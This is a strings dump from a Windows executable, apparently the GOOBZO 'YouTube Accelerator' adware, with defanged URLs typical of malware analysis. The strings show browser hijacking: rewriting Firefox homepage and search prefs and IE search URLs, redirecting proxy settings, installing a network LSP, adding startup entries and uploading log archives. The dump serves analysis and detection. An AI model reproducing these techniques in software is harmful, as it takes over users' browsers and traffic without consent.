.?AV?$IMultiBaseInterface@VIPipeEventThreadManagerFactory@@@@
.?AVIPipeEventThreadManagerFactory@@
.?AV?$CMultiBaseInterface@VCPipeEventThreadManagerFactory@@VIPipeEventThreadManagerFactory@@@@
.?AVCPipeEventThreadManagerFactory@@
<>"#{}|\^~[]`' ?&
.?AVCSABaseWebWindow@@
.?AVCSANotifierWebWindow@@
.?AVCSAWebWindow@@
.PAVCMemoryException@@
.?AVCWebBrowser2@@
.?AVCWebForm@@
.?AVCWebElement@@
.?AVCWebInput@@
.?AVCWebAnchor@@
.?AVCWebDiv@@
.?AVCWebCheckBox@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCFileException@@
zcÁ
aSSSh
FTPjK
FtPj;
C.PjRV
]@ ]( ]8
FTPQ
.?AVunsupported_thread_option@boost@@
SetProcessShutdownParameters
kernel32.dll
COMCTL32.DLL
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
Required USB Key not found
Failed to execute target process
Cannot find import; DLL may be missing, corrupt, or wrong version
File "%s", function "%s"
File "%s", ordinal %d
File "%s", error %d
(Error code %d)
%X:DAF
(Location XEB, error code %d)
_PAD%d
RNX
%X::DAX
.DbgLog
GetWindowsDirectoryW
CreateDialogIndirectParamW
Kernel32.dll
User32.dll
ComDlg32.dll
1.2.3
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_DENORMAL_OPERAND
boost::unsupported_thread_option
mscoree.dll
Visual C   CRT: Not enough memory to complete call to strerror.
.mixcrt
ADVAPI32.DLL
portuguese-brazilian
Broken pipe
Inappropriate I/O control operation
Operation not permitted
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
%Program Files% (x86)\YouTube Accelerator\YouTubeAccelerator-2.DbgLog
%Program Files% (x86)\YouTube Accelerator\YouTubeAccelerator.exe
GetWindowsDirectoryA
EnumThreadWindows
EnumWindows
CreateDialogIndirectParamA
GetAsyncKeyState
comdlg32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
^.Ad/
.Zvv[
j%FwL
e.tu/
5%up/
A.YNpN\n
%Um-IF
.BV$L|
%X1:S
`?T%Sj
%x@k4
.iyDY
j.Wsf
Cr.BxL
V.Fb7|
$"bM-Q}n
%x R\X
4%sPp
_%S3@
.LvHT
.owm;y,
}R.zmA
.bi@{
>I|.pt|d
t_\A
p}.GF
G){.mf
.xh$x
U.gs!
J|0.tL
.iJp`
.zE:aG
.7%Xs
-DED%xFqz
%cnzb
%UQzss
1%.Ey\=
/\%Dg
.FlC\5
.cA~;
P?=I_.or\
E.yb|4
%SuSw
T.UHuR
,'*%f
!.OUV
.FLy3
jS.TP]
ULsD1A%C
.Wk4ka&F
=.BJu
.Ao$u
w%fVb
Ü/OK1I
vAR%5s_
.OM4t
~UsQl^
h2%XL
|RZ%X#
Al-f}
Zdr.Uzr
'5,# {:#
L.gSeC
.Xw_I
|v%s9
j,M
CPX.ta
S.OSC
<.fRv
kksQl
}C.Xz
'(}:"%;'
8,.Dl
y%swo
XX.VK
..Jz`
,'.mM
@M.kuMhW
CQ.ug
{\.Gpf
.LHP9Q
U|i
.epAjX(
&i.zi
%DHTz
j8.CW
I7Û
.BR }:
-.Ozl
6'.VA
"x.UU;
.MtNM
9;}%X
%SAw'[
.xVCVe7x
%s7$T
.aP4\Wa
 %DmQ.
ce.Sz0{6
7_:%d
bjz6Œ8[
t1.AU
zTaB.nf
)g.ow
^__:;;,,,~
9:;556011---
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
%s (%s:%d)
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
JhXXp://@BRAND_ID@.@[email protected]/support/video-sites
hXXp://@BRAND_ID@.@[email protected]/buy/hd/
hXXp://wiki.@[email protected]/doku.php?id=va:start
%s?OEM=%s
hXXp://VVV.@[email protected]
hXXp://@BRAND_ID@.@[email protected]/legal/license
blank.html
hXXp://VVV.@[email protected]/legal/privacy
[CAcceleratorEventsData::OnDeserialize] ___Error get URL
@CActivationBrowser::OnBeforeNavigate : url = %s
CActivationBrowser::OnNavigateComplete : url = %s
CActivationBrowser::OnNavigateError : url = %s
Res.dll
CActivationBrowser::SetMetaData GOT 'OPEN_URL'
OPEN_URL
CActivationBrowser::SetMetaData GOT 'ACTIVATION_BACK_URL'
ACTIVATION_BACK_URL
activation_offline.mht
%X%X%X
hXXp://client.@[email protected]/clientva/Activation.aspx
CActivationBrowser::OnDocumentComplete : url = %s
ipc.dll
\\.\pipe\GOOBZO_VAPIPESERVERENG
LastNum%d
LastID%d
\\.\pipe\GOOBZO_VAPIPESERVERUI
CBrowserSettings::RegisterDLL - LoadLibrary() Failed: %s
CBrowserSettings::RegisterDLL %s
%s = %s; expires = %s
%a,%d-%b-%Y %H:%M:%S GMT
2prefs.js
profiles.ini
profile%d
Mozilla\Firefox\
cookies.txt
Software\Microsoft\Internet Explorer\AboutURLs
user_pref("keyword.URL", "%s");
Use Custom Search URL
DefaultSearchURL
SBSearch.dll
SearchURL
Web Search
user_pref("browser.startup.homepage","%s");
restore.GOOBZO.com
hXXp://search.GOOBZO.com
search.GOOBZO.com
%d-%b-%Y
hXXp://restore.GOOBZO.com
user_pref("browser.startup.homepage",
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
HTTP/1.1
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="%s"
XXX
[CCommandsQueue::SetAsync (%p)] ___Error CreateEvent(), Error: %d
[CCommandsQueue::CCommandsQueue - (%p)] CreateEvent() - Failed, Error: %d
test.youtubeaccelerator.com
hXXp://test.youtubeaccelerator.com/video_accelerator/wizardtest/SMALLTEST.HTM?random=%d&mode=%s
Windows CE
Windows 7
Windows Vista
Windows 2003 Server
Windows XP
Windows 2000
Windows NT
Windows Me
Windows 98
Windows 95
[CCommTest::SetEngineMode] %d
vaproxy.pac
[CCommTest::StartServiceTest] ___Error Default EngineMode = %d !!!
[CCommTest::StartGuiTest] ___Error to create VACommTest process. LE: %d
testlsp.exe
[CCommTest::ProcessNextState] ___Error State = %d !!!
[CCommTestDlg::KillAllTimers] m_ConnectivityCheckTimer Timer: %d
[CCommTestDlg::ResetConnectionTimer] SetTimer: %d
[CCommTestDlg::ResetConnectivityCheckTimer] SetTimer: %d
CCommTestDlg::OnTimer() - m_ConnectionTestFailedTimer: %d
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
showitunesMsg
DontShowAccelerationNotSupported
lastiTunesMsgTime
ManualProxyPort
[CConfig::IsLastTestingSucceeded] REGISTRY - Status = %d
[CConfig::IsLastTestingSucceeded] XML - Status = %d
[CConfig::SetLastTestingSucceeded] ___Error LastTestingSucceeded = %d (XML)
[CConfig::SetLastTestingSucceeded] LastTestingSucceeded = %d (XML)
[CConfig::IsTestingMode] ___Error TestingMode = %d (XML)
[CConfig::IsTestingMode] TestingMode = %d (XML)
[CConfig::SetTestingMode] ___Error TestingMode = %d (XML)
[CConfig::SetTestingMode] TestingMode = %d (XML)
[CConfig::GetBrandPort] BrandPort = %d
br_port
CConfig::SetCurrentUserKey
ReportCommFailed
[CConfig::SetSendLogFiles] Status = %d
[CConfig::SetSendInstLogFileOnly] Status = %d
[CConfig::GetCurrentUserKey] ___Error spIImpersonateThread == NULL
[CConfig::SetTracerOff] ___Error GetRegistryKeys
[CConfig::SetBackup] ___Error GetRegistryKeys
[CConfig::SetBackup] Status = %d
[CConfig::AddToLearningDomainsList] ___Error adding the domain %s to the learning domains list
[CConfig::AddToLearningDomainsList] The domain %s was added to the learning domains list
[CConfig::IsXBoxMode] Status = %d
[CConfig::SetTracerOn] ___Error GetRegistryKeys
[CConfig::SetTracer] Status = %d
B%sLow\%s\
%C:\Users\Public\Documents\%s\%s\
%s\%s\%s\
%s\Application Data\%s\%s\
[CCoreConfig::InitConfig] Product Name %s UseRegistry %d
You are using %s - Translated by:
[CFileResource::Load] ___Error SizeofResource: %d
[CFileResource::Load] ___Error LockResource: %d
[CFileResource::Load] ___Error LoadResource: %d
[CFileResource::Load] ___Error FindResource: %d
[CFileResource::Load] %s
[CFileResource::Extract] ___Error Write: %d
[CFileResource::Extract] ___Error Create: %d
[CFileResource::Extract] %s
[CFileResource::ExtractAll] ___Error ExtractResourceFromList: %x
[CFileResource::ExtractAll] ___Error EnumResourceTypes: %d
ListenPort
[EngineConfiguration::GetCurrentUserKey] User Key: %X
[EngineConfiguration::GetCurrentUserKey] ___Error spIImpersonateThread == NULL
HttpRedirectProxyPort
HttpRedirectProxyDomain
[CEventsThread::SetTimeoutResolution] From: %d -> To: %d
[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms
[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms
[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d
[CEventsThread::WaitForMultipleEvents] TID=%X
[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d
[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d
[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...
[CEventsThread::Start - Leave] TID=%X
[CEventsThread::Start] ___Error - Failed to create thread: %X
[CEventsThread::Stop - Leave] TID=%X
[CEventsThread::Stop - Enter] TID=%X
B[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d
[CEventsThread::AlertEvent] ___Error SetEvent failed: %d
[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d
[CEventsThread::AlertEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d
[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] Event: %d
[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d
[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d
[CEventsThread::ResetEvent] ___Error Not found Event: %d
[CEventsThread::ResetEvent] Event: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d
[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d
[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d
[CEventsThread::RemoveEvent] ___Error Not found Event: %d
[CEventsThread::RemoveEvent] Event: %d
[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d
[CEventsThread::Cleanup] Closing Handle: %d
[CEventsThread::WaitEvent] TID=%X
[CEventsThread::Work] TID=%X - Exit !!!
[CEventsThread::Work] WAIT_ABANDONED - %d
[CEventsThread::Work] TID=%X
B[CEventsThread::AddEvent] ___Warning event handle already exists %d
[CEventsThread::AddEvent] ___Error invalid event handle %d
[CExecuteUpdate::OnDeserialize] ___Error get m_ShowCmd
[CExecuteUpdate::OnDeserialize] ___Error get m_Directory
[CExecuteUpdate::OnDeserialize] ___Error get m_Parameters
[CExecuteUpdate::OnDeserialize] ___Error get m_Operation
[CExecuteUpdate::OnDeserialize] ___Error get m_File
[CExecuteUpdate::RunUpdate] ___Error ShellExecute: %s, Faild: %d
http_port
user.js
user_pref("network.proxy.
autoconfig_url
Windows XP Firewall (ICF)
SOFTWARE\McAfee.com\Personal Firewall
DAP.EXE
Windows Security Alert
%d.%d.%d.%d
HttpHandleAll
HttpWorkerBufferLimit
HttpListenPort
HttpListenIP
.html
\winhlp32.exe
[CIEInternetProxySettings::RetriveProxyConfiguration - Exit] list.pOptions == NULL
[CIEInternetProxySettings::ApplyProxyConfiguration] InternetSetOption( INTERNET_OPTION_REFRESH ) - Failed: %d
[CIEInternetProxySettings::ApplyProxyConfiguration] InternetSetOption( INTERNET_OPTION_SETTINGS_CHANGED ) - Failed: %d
[CIEInternetProxySettings::ApplyProxyConfiguration] InternetSetOption() - Failed: %d
[CIEInternetProxySettings::IsOptionIncluded] NOT Found - Option: %d, Value: %d
[CIEInternetProxySettings::IsOptionIncluded] Found - Option: %d, Value: %d
[CIEInternetProxySettings::IsOptionIncluded] NOT Found - Option: %d, Value: %s
[CIEInternetProxySettings::IsOptionIncluded] Found - Option: %d, Value: %s
[CIEInternetProxySettings::IsOptionIncluded] Found - Option: %d, Value: NULL
[CIEInternetProxySettings::SetProxyConfigScript] InternetSetOption( INTERNET_OPTION_REFRESH ) - Failed: %d
[CIEInternetProxySettings::Refresh] InternetSetOption( INTERNET_OPTION_SETTINGS_CHANGED ) - Failed: %d
[CIEInternetProxySettings::SetProxyConfigScript] InternetSetOption() - Failed: %d
[CIEInternetProxySettings::SetProxyConfigScript] list.pOptions == NULL
[CIEInternetProxySettings::GetCurrentUserKey] User Key: %p
[CIEInternetProxySettings::GetCurrentUserKey] ___Error spIImpersonateThread == NULL
[CIEInternetProxySettings::SetProxyConfigScript] InternetSetOption( INTERNET_OPTION_SETTINGS_CHANGED ) - Failed: %d
http=
[CIEInternetProxySettings::Save] %s - %s = %s
[CImpersonate::Impersonate] ImpersonateLoggedOnUser - Error: %d
[CImpersonate::Impersonate] Impersonated: %d
[CImpersonate::Revert] RevertToSelf - Error: %d
[CImpersonate::Revert] Impersonated: %d
[CImpersonate::Cleanup] Impersonated: %d
[CImpersonate::GetUserSID] LookupAccountNameW failed. GetLastError returned: %d
[CImpersonate::GetUserSID] The SID for %s is invalid.
[CImpersonate::GetUserSID] Not Enough Memory: %d
[CImpersonate::SetPrivilege] AdjustTokenPrivileges - Error: %d
[CImpersonate::SetPrivilege] LookupPrivilegeValue - Error: %d
[CImpersonate::OpenCurrentUserDesktop] - The function does not support Windows Vista and Windows 98
[CImpersonate::OpenCurrentUserDesktop] OpenDesktop - Error: %d
[CImpersonate::OpenCurrentUserDesktop] OpenInputDesktop - Error: %d
[CImpersonate::OpenCurrentUserDesktop] SetProcessWindowStation - Error: %d
[CImpersonate::OpenCurrentUserDesktop] OpenWindowStation - Error: %d
[CImpersonate::OpenCurrentUserDesktop] GetProcessWindowStation - Error: %d
[CImpersonate::OpenCurrentUserDesktop] - The function does not support MAC
[CImpersonate::CreateProcessAsCurrentUser] CreateProcessAsUser - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] CreateEnvironmentBlock - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] AddAceToDesktop - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] AddAceToWindowStation - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] GetLogonSID - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] DuplicateTokenEx - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] OpenDesktop - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] SetProcessWindowStation - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] OpenWindowStation - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] GetProcessWindowStation - Error: %d
[CImpersonate::AddAceToWindowStation] SetUserObjectSecurity - Error: %d
[CImpersonate::AddAceToWindowStation] SetSecurityDescriptorDacl - Error: %d
[CImpersonate::AddAceToWindowStation] CopySid - Error: %d
[CImpersonate::AddAceToWindowStation] AddAce - Error: %d
[CImpersonate::AddAceToWindowStation] GetAce - Error: %d
[CImpersonate::AddAceToWindowStation] GetAclInformation - Error: %d
[CImpersonate::AddAceToWindowStation] GetUserObjectSecurity - Error: %d
[CImpersonate::AddAceToDesktop] SetUserObjectSecurity - Error: %d
[CImpersonate::AddAceToDesktop] SetSecurityDescriptorDacl - Error: %d
[CImpersonate::AddAceToDesktop] AddAccessAllowedAce - Error: %d
[CImpersonate::AddAceToDesktop] AddAce - Error: %d
[CImpersonate::AddAceToDesktop] GetAce - Error: %d
[CImpersonate::AddAceToDesktop] GetSecurityDescriptorDacl - Error: %d
[CImpersonate::AddAceToDesktop] GetUserObjectSecurity - Error: %d
[CImpersonate::OpenCurrentUserKey] LoadUserProfile - SUCCESS
[CImpersonate::OpenCurrentUserKey] LoadUserProfile failed - Error: %d
[CImpersonate::GetLogonUserName] GetLogonUserName - Error: %d
[CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - Error: %d
[CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - SUCCESS
[CImpersonate::OpenCurrentUserKey] Impersonated: %d
[CImpersonate::FindLoggedOnUser] Process32First - Error: %d
[CImpersonate::FindLoggedOnUser] OpenProcess - Error: %d
[CImpersonate::FindLoggedOnUser] OpenProcessToken - Error: %d
[CImpersonate::FindLoggedOnUser] CreateToolhelp32Snapshot failed - Error: %d
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
explorer.exe
[CImpersonate::FindLoggedOnUser] Impersonated: %d
[CImpersonate::GetLogonUserName] Name: %s
[CImpersonate::GetLogonUserName] GetUserName - Error: %d
[CImpersonateThread::NotifyImpersonateLogon] Time: %d
[CImpersonateThread::NotifyImpersonateLogoff] Time: %d
[CImpersonateThread::ProcessEvent] CreateProcess - CmdLine: %s, AppName: %s, ShowCmd: %d
[CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(TRUE), LE: %d
[CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(FALSE) failed: %d
[CImpersonateThread::CreateProcess] CmdLine: %s, AppName: %s, ShowCmd: %d
Name: %s
Path: %s
Version: %s
%s_%d.log
CSLogReportEventThread::DoPacLogFiles] Zip file created.
*.bak
CSLogReportEventThread::DoPacLogFiles] ___Error FindFirstFile( %s ): %d
*.log
Config.xml
CSLogReportEventThread::DoPacLogFiles] ___Error to Create Zip file.
BakLspCommTest.zip
LspCommTest.zip
[CSLogReportEventThread::DoPostZipFile] ___Error POST FAILED. LE: %X
[CSLogReportEventThread::DoPostZipFile] POST SUCCEEDED
hXXp://online.@[email protected]/online/CommunicationTestFailed.aspx
[CSLogReportEventThread::DoPostZipFile] Trying to POST...
[CSLogReportEventThread::DoPostZipFile] ___Error CHttp to Connect: %X, Server: %s
hXXp://online.@[email protected]/online/
CSLogReportEventThread::DoPostZipFile] ___Error CFile64 to get Zip file length.
CSLogReportEventThread::DoPostZipFile] ___Error CFile64 to open file: %s
[ProxySettingsConfiguration::RestoreOriginalSettings] ___Error ApplyIEProxySettings - Wait: %d
[ProxySettingsConfiguration::RestoreOriginalSettings] ___Error ApplyIEProxySettings - ProcessCommand: %d
[ProxySettingsConfiguration::SaveApplied] ___Error RetrieveIEProxySettings - Wait: %d
[ProxySettingsConfiguration::SaveApplied] ___Error RetrieveIEProxySettings - ProcessCommand: %d
[ProxySettingsConfiguration::SaveOriginal] ___Error RetrieveIEProxySettings - Wait: %d
[ProxySettingsConfiguration::SaveOriginal] ___Error RetrieveIEProxySettings - ProcessCommand: %d
[ProxySettingsConfiguration::RetriveExisting] ___Error RetrieveIEProxySettings - Wait: %d
[ProxySettingsConfiguration::RetriveExisting] ___Error RetrieveIEProxySettings - ProcessCommand: %d
[ProxySettingsConfiguration::SetProxyConfigScript] ___Error SetProxyConfigScript - Wait: %d
[ProxySettingsConfiguration::SetProxyConfigScript] ___Error SetProxyConfigScript - ProcessCommand: %d
SOFTWARE\GOOBZO\YouTube Accelerator\%s\Original
SOFTWARE\GOOBZO\YouTube Accelerator\%s\Current
M[CRegistrationMgr::IsTrialVersion]%d
exp=%d
ins=%d
Dur=%d
[CRegistrationMgr::SetTrial] ___Error XMLNode::emptyNode %s
[CRegistrationMgr::UpdateTrialParams] ___Error XMLNode::emptyNode %s
Trial.dat
Trial_QA.xml
[CRegistrationMgr::StartTrial] ___Error XMLNode::emptyNode %s
[CRegistrationMgr::GetBoolNagFlagTrialExpAcceleration] ___Error XMLNode::emptyNode .%d
[CRegistrationMgr::GetBoolNagFlagTrialExpAcceleration] ___Error XMLNode::emptyNode %d
[CRegistrationMgr::GetBoolNagFlagTrialExpAcceleration] ___Error XMLNode::emptyNode %s
[CRegistrationMgr::HandleTrialScenario] ___Error XMLNode::emptyNode %d
[CRegistrationMgr::HandleTrialScenario] ___Error XMLNode::emptyNode %s
[CRegistrationMgr::GetBuyNowDailyString] ___Error XMLNode::emptyNode .%d
[CRegistrationMgr::GetBuyNowDailyString] ___Error XMLNode::emptyNode %d
[CRegistrationMgr::GetBuyNowDailyString] ___Error XMLNode::emptyNode %s
[CRegistrationMgr::GetRotatedString] ___Error XMLNode::emptyNode %d
[CRegistrationMgr::GetRotatedString] ___Error XMLNode::emptyNode %s
[CRegistrationMgr::GetContinueTrialDailyString] ___Error XMLNode::emptyNode %d
[CRegistrationMgr::GetContinueTrialDailyString] ___Error XMLNode::emptyNode %s
(%d days left)
DAYURL
[CRegistrationMgr::GetDailyUrl] ___Error XMLNode::emptyNode %d
[CRegistrationMgr::GetDailyUrl] ___Error XMLNode::emptyNode %s
[CRegistrationMgr::GetDailyUrl]
[CRegistrationMgr::GetContinueTrialDailyUrl] ___Error XMLNode::emptyNode %d
[CRegistrationMgr::GetContinueTrialDailyUrl] ___Error XMLNode::emptyNode %s
[CRegistrationMgr::GetContinueTrialDailyUrl]
[CRegistrationMgr::GetContinueTrialBtnTxt] ___Error XMLNode::emptyNode %d
[CRegistrationMgr::GetContinueTrialBtnTxt] ___Error XMLNode::emptyNode %s
xmldb.dll
config.xml
RtmpListenPort
MiTunes.exe
[CSA_GUIApp::RegisterCommTestEvents] ___Error m_pPipeEventThread == NULL
[CSA_GUIApp::UnRegisterCommTestEvents] ___Error m_pPipeEventThread == NULL
[CSA_GUIApp::IsTrial] m_bIsTrial = %d
User%d
[CSA_GUIApp::GoToURL] ___Error FindExecutable failed url = %s
[CSA_GUIApp::GoToURL] ___Error The specified file was not found
YouTubeAccelerator.exe
[CSA_GUIApp::IsTestingSucceeded] InstalledLspVersion: %s, SBLSP: %s
ytalsp.dll
[CSA_GUIApp::UpdateRunOnStartup] Creating Run on startup registry key for %s
[CSA_GUIApp::RunUnwise] ___Error WaitForSingleObject: %d
[CSA_GUIApp::RunUnwise] ___Error CreateProcess: %d, Command: %s
unwise.exe
[CSA_GUIApp::GetTempDir] ___Error GetTempPath: %d
[CSA_GUIApp::GetTempDir] Folder: %s
[CSA_GUIApp::RunFromTemp] ___Error CreateProcess: %d, Command: %s
%s %s
[CSA_GUIApp::RunFromTemp] ___Error Copy: %s - to Temp: %s
YoutubeAcceleratorService.exe
D[CSA_GUIApp::SetTestingSucceeded] InstalledLspVersion: %s
[CSA_GUIApp::UpdateResourceDll] ___Error Removing %s. Err = %d
[CSA_GUIApp::UpdateResourceDll] ___Error Renaming %s to %s. Err = %d
[CSA_GUIApp::UpdateResourceDll] ___Error ExtractDataFromResFile: %x (Temp)
[CSA_GUIApp::UpdateResourceDll] VAResTemp.dll file Path: %s
Res\VARes_%d\
[CSA_GUIApp::UpdateResourceDll] ___Error ExtractDataFromResFile: %x
[CSA_GUIApp::UpdateResourceDll] ___Error CreateDirectoryRecursivlyFromPath: %x
[CSA_GUIApp::UpdateResourceDll] Resources Folder: %s
VARes_%d\
[CSA_GUIApp::UpdateResourceDll] DllVer: %d, RegVer: %d, TmpVer: %d
ResOld.dll
ResTemp.dll
[CSA_GUIApp::UpdateResourceDll] ___Error GetPath: %x
[CSA_GUIApp::RunFinishHtml] GotoURL status is %d
[CSA_GUIApp::RunFinishHtml] Finish URL is : %s
hXXp://@BRAND_ID@.@[email protected]/finishinstall?
hXXp://rep.@[email protected]/app/ping.ashx
engine.dll
[CSA_GUIApp::FormatURL] URL: %s
&TrialDaysLeft=%d
?V=%s&pr=%d&Beta=%d&Emode=%d
[CSA_GUIApp::InitInstance] __Error m_pPipeEventThread = NULL
[CSA_GUIApp::InitInstance] Uninstall URL - GotoURL status is %d
[CSA_GUIApp::InitInstance] ___Error to load VideoAccelerator - CreateDialog Failed: %d
VA???.lng
[CSA_GUIDlg::OnShowTrayIcon] - m_TrayIcon.ShowIcon() Failed !!!
[CSA_GUIDlg::SetOpenMainWindowDisableFlag]bVal = %d
%s&OEM=%s
hXXp://@BRAND_ID@.@[email protected]/support/help
VIDEO_ACCELERATOR.MHT
[CSA_GUIDlg::ShowMenora] ___Error No lending url
[CSA_GUIDlg::OnMenoraOpen] ___Error url empty
[CSA_GUIDlg::RunLspInstaller] ___Error - LSP installer returned after Timeout, error %d
[CSA_GUIDlg::RunLspInstaller] ___Error - LSP installer returned failure %d, error %d
[CSA_GUIDlg::RunLspInstaller] Wait for LSP Installer process to complete for %d milsecs...
[CSA_GUIDlg::RunLspInstaller] Executing LSP Installer process: %s
-b -d %s
lspinst2.exe
lspinst.exe
CSABaseWebWindow::OnBeginDrag
CSABaseWebWindow::OnStopDrag
ECSABaseWebWindow::Navigate : url = %s
CSABaseWebWindow::OnNavigateError : url = %s
CSABaseWebWindow::OnNavigateComplete : url = %s
CSABaseWebWindow::OnDocumentComplete : url = %s
CSANotifierWebWindow::SetMetaData GOT 'height'
CSANotifierWebWindow::SetMetaData GOT 'width'
[CSANotifierWebWindow::ReplaceLNGTags] replacing "%s" with "%s" = "%s" from String table
[CSANotifierWebWindow::ReplaceLNGTags] ___Error no "%s" in String table, putting "%s"
[CSANotifierWebWindow::ReplaceLNGTags] ALT case replacing <STRING_GOES_HERE> at "%s" with "%s" = "%s" from String table
[CSANotifierWebWindow::ReplaceLNGTags] ___Error ALT case no "%s" in String table, putting "%s" instead of <STRING_GOES_HERE> at "%s"
[CSANotifierWebWindow::ReplaceLNGTags] length %d
[CSANotifierWebWindow::ReplaceLNGTags]
[CSANotifierMgr::GetAvaliableNotifier] Message %d is already displayed
ItweetMessage.mht
SilentTestFailed.mht
SilentTestSucceeded.mht
ITUNESMESSAGE.MHT
hXXp://VVV.fileratings.com/video/@PRODUCT_DOMAIN@/12/buyiTunes.asp
OldDriver.mht
Activation_Expired.mht
noupdates.mht
exiting.mht
va_on.mht
va_off.mht
dl_update.mht
update.mht
HD_DISABLED.MHT
ACCELERATION_NOT_SUPPORTED.MHT
now_accelerating.mht
ACCELERATION_NOT_SUPPORTED_CHECKBOX
ACCELERATION_NOT_SUPPORTED_BUTTON_OK
%d days left.
%d Days left
<d/d/%d d:d:d::d 0x%X>
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
\StringFileInfo\x\%s
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::BackupTraceFile] %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] SetSecurityDescriptorDacl failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeSecurityDescriptor failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the trusted owner. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the Everyone group. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the queue owner. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeAcl failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetLogonSID failed. Error code: 0x%X
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AllocateAndInitializeSid failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetTokenInformation failed. GetLastError returned: %d
[CSerializable::GetField] ___Error - Vector size missmatch. Code: %d
F[CServiceController::ChangeStartType] ___Error ChangeServiceConfig failed: %d
[CServiceController::ChangeStartType] ___Error OpenService: %s, failed: %d
[CServiceController::ChangeStartType] ___Error OpenSCManager failed: %d
[CServiceController::ChangeStartType] Name: %s
[CServiceController::ExecuteServer] Exit
[CServiceController::ExecuteServer] Enter
[CServiceController::ServiceMain] ___Error SetServiceStatus Failed: %d
[CServiceController::ServiceMain] ___Error RegisterServiceCtrlHandler Failed: %d
[CServiceController::UpdateServiceDespatchTable] ___Error Exception StartServiceCtrlDispatcher Failed: %d
[CServiceController::UpdateServiceDespatchTable] ___Error StartServiceCtrlDispatcher Failed: %d
[CServiceController::UpdateServiceDespatchTable] Enter, %s
[CServiceController::Install] ___Error OpenService Failed: %d
[CServiceController::Install] ___Error QueryServiceStatus Failed: %d
